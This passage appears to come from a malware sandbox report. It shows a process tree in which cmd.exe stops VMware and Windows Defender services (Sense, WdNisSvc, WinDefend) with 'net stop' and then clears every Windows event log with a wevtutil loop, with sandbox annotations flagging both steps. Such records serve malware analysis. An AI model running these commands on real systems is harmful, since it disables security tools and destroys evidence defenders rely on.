- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
    3⤵
    PID:1216
  - - C:\Windows\system32\net.exe
      net stop "VMnetDHCP"
      4⤵
      PID:60
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMnetDHCP"
        5⤵
        
        PID:1884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
    3⤵
    PID:1320
  - - C:\Windows\system32\net.exe
      net stop "VMware NAT Service"
      4⤵
      PID:272
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMware NAT Service"
        5⤵
        
        PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
    3⤵
    PID:3472
  - - C:\Windows\system32\net.exe
      net stop "VMUSBArbService"
      4⤵
      PID:220
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMUSBArbService"
        5⤵
        
        PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
    3⤵
    PID:820
  - - C:\Windows\system32\net.exe
      net stop "VMwareHostd"
      4⤵
      PID:984
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMwareHostd"
        5⤵
        
        PID:3768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sense"
    3⤵
    PID:3752
  - - C:\Windows\system32\net.exe
      net stop "Sense"
      4⤵
      PID:3520
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sense"
        5⤵
        
        PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
    3⤵
    PID:3840
  - - C:\Windows\system32\net.exe
      net stop "WdNisSvc"
      4⤵
      PID:2196
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WdNisSvc"
        5⤵
        
        PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WinDefend"
    3⤵
    PID:784
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:1260
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
    3⤵
    PID:3744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wevtutil.exe el
      4⤵
      PID:3880
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe el
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "AMSI/Debug"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:428
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "AirSpaceChannel"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Analytic"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:3024
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Application"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:912
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DirectShowFilterGraph"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3452
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DirectShowPluginControl"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1172
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Els_Hyphenation/Analytic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:908
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "EndpointMapper"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3472
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "FirstUXPerf-Analytic"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:3768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "ForwardedEvents"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:984
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "General Logging"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:820
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "HardwareEvents"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3792
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "IHM_DebugChannel"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1644
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3196
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:368
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1792
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3616
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Internet Explorer"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2924
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Key Management Service"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2964
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1260
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:2452
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MF_MediaFoundationFrameServer"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MedaFoundationVideoProc"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:788
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MedaFoundationVideoProcD3D"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:840
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationAsyncWrapper"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:740
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationContentProtection"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3396
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationDS"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2944
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationDeviceProxy"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2220
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationMP4"
      4⤵
      PID:1424
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationMediaEngine"
      4⤵
      PID:2244
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPerformance"
      4⤵
      PID:1872
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPerformanceCore"
      4⤵
      PID:2180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPipeline"
      4⤵
      Clears Windows event logs
      PID:2804
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPlatform"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationSrcPrefetch"
      4⤵
      PID:3948
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
      4⤵
      PID:2428
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-AppV-Client/Admin"
      4⤵
      PID:2748
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-AppV-Client/Debug"
      4⤵
      Clears Windows event logs
      PID:2176
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-AppV-Client/Operational"
      4⤵
      PID:3032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
      4⤵
      PID:3048
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
      4⤵
      PID:3348
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
      4⤵
      PID:4016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
      4⤵
      PID:332
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IE/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:3468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:1540
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
      4⤵
      PID:3592
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
      4⤵
      PID:4008
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
      4⤵
      PID:204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:3880
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
      4⤵
      PID:860
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
      4⤵
      PID:1912
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
      4⤵
      PID:1564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
      4⤵
      PID:3000
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
      4⤵
      PID:3652
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
      4⤵
      Clears Windows event logs
      PID:3972
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
      4⤵
      PID:2132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
      4⤵
      PID:448
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
      4⤵
      PID:1556
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
      4⤵
      PID:3520
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
      4⤵
      PID:3752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
      4⤵
      PID:2104
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
      4⤵
      PID:3840
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
      4⤵
      PID:3016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
      4⤵
      PID:2296
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
      4⤵
      PID:1228
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
      4⤵
      PID:1500
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
      4⤵
      PID:3320
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
      4⤵
      PID:2820
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
      4⤵
      PID:3672
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
      4⤵
      PID:1856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
      4⤵
      PID:3976
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
      4⤵
      PID:3824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
      4⤵
      PID:2188
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
      4⤵
      PID:2432
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
      4⤵
      PID:3640
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
      4⤵
      Clears Windows event logs
      PID:3932
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
      4⤵
      PID:4068
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
      4⤵
      PID:2440
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
      4⤵
      PID:2640
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
      4⤵
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
      4⤵
      PID:2576
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
      4⤵
      PID:3080
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
      4⤵
      PID:3608
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
      4⤵
      PID:2756
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
      4⤵
      PID:3384
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
      4⤵
      PID:2068
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
      4⤵
      PID:3764
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppSruProv"
      4⤵
      Clears Windows event logs
      PID:3476
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:1140
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
      4⤵
      PID:748
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
      4⤵
      PID:3636
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
      4⤵
      PID:1164
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
      4⤵
      Clears Windows event logs
      PID:2416
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
      4⤵
      Clears Windows event logs
      PID:860
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
      4⤵
      PID:216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
      4⤵
      PID:912
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
      4⤵
      PID:908
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
      4⤵
      PID:3760
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
      4⤵
      PID:984
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
      4⤵
      PID:2872
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
      4⤵
      PID:972
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
      4⤵
      PID:3520
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
      4⤵
      PID:2008
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
      4⤵
      PID:2196
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
      4⤵
      PID:3616
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
      4⤵
      PID:2204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
      4⤵
      Clears Windows event logs
      PID:2924
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
      4⤵
      PID:2964
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
      4⤵
      PID:1260
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
      4⤵
      Clears Windows event logs
      PID:784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
      4⤵
      PID:3560
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
      4⤵
      PID:2708
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
      4⤵
      PID:1856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
      4⤵
      PID:3300
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
      4⤵
      PID:2188
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
      4⤵
      PID:2432
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
      4⤵
      Clears Windows event logs
      PID:312
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
      4⤵
      PID:3932
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
      4⤵
      PID:4068
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
      4⤵
      PID:4072
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
      4⤵
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
      4⤵
      Clears Windows event logs
      PID:3280
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
      4⤵
      PID:2560
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
      4⤵
      PID:3656
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
      4⤵
      Clears Windows event logs
      PID:3388
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
      4⤵
      PID:332
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
      4⤵
      PID:3468
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
      4⤵
      PID:2996
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"
      4⤵
      PID:1884
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"
      4⤵
      PID:4008
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
      4⤵
      PID:2032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"
      4⤵
      PID:1320
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
      4⤵
      PID:3564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
      4⤵
      PID:1564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
      4⤵
      PID:1740
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Backup"
      4⤵
      PID:1172
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
      4⤵
      PID:3972
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
      4⤵
      PID:2604
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
      4⤵
      PID:448
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
      4⤵
      Clears Windows event logs
      PID:2580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
      4⤵
      PID:540
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
      4⤵
      PID:3752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
      4⤵
      PID:3296
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
      4⤵
      PID:1400
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
      4⤵
      Clears Windows event logs
      PID:2444
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
      4⤵
      PID:1180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
      4⤵
      PID:3616
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
      4⤵
      PID:2204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
      4⤵
      PID:2924
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
      4⤵
      PID:2964
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"
      4⤵
      PID:1260
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
      4⤵
      PID:784
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
      4⤵
      PID:3560
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
      4⤵
      PID:2708
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
      4⤵
      PID:1856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
      4⤵
      PID:3776
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
      4⤵
      PID:1436
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
      4⤵
      PID:2852
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
      4⤵
      PID:2180
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
      4⤵
      PID:3632
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
      4⤵
      PID:4056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
      4⤵
      PID:3928
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
      4⤵
      PID:2796
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
      4⤵
      PID:2576
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
      4⤵
      Clears Windows event logs
      PID:3032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/Call"
      4⤵
      PID:372
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
      4⤵
      PID:3384
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
      4⤵
      Clears Windows event logs
      PID:3292
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
      4⤵
      PID:3044
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
      4⤵
      PID:3476
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
      4⤵
      PID:1280
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
      4⤵
      PID:3304
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
      4⤵
      PID:204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
      4⤵
      Clears Windows event logs
      PID:4008
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
      4⤵
      PID:2032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
      4⤵
      PID:1320
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
      4⤵
      PID:3564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
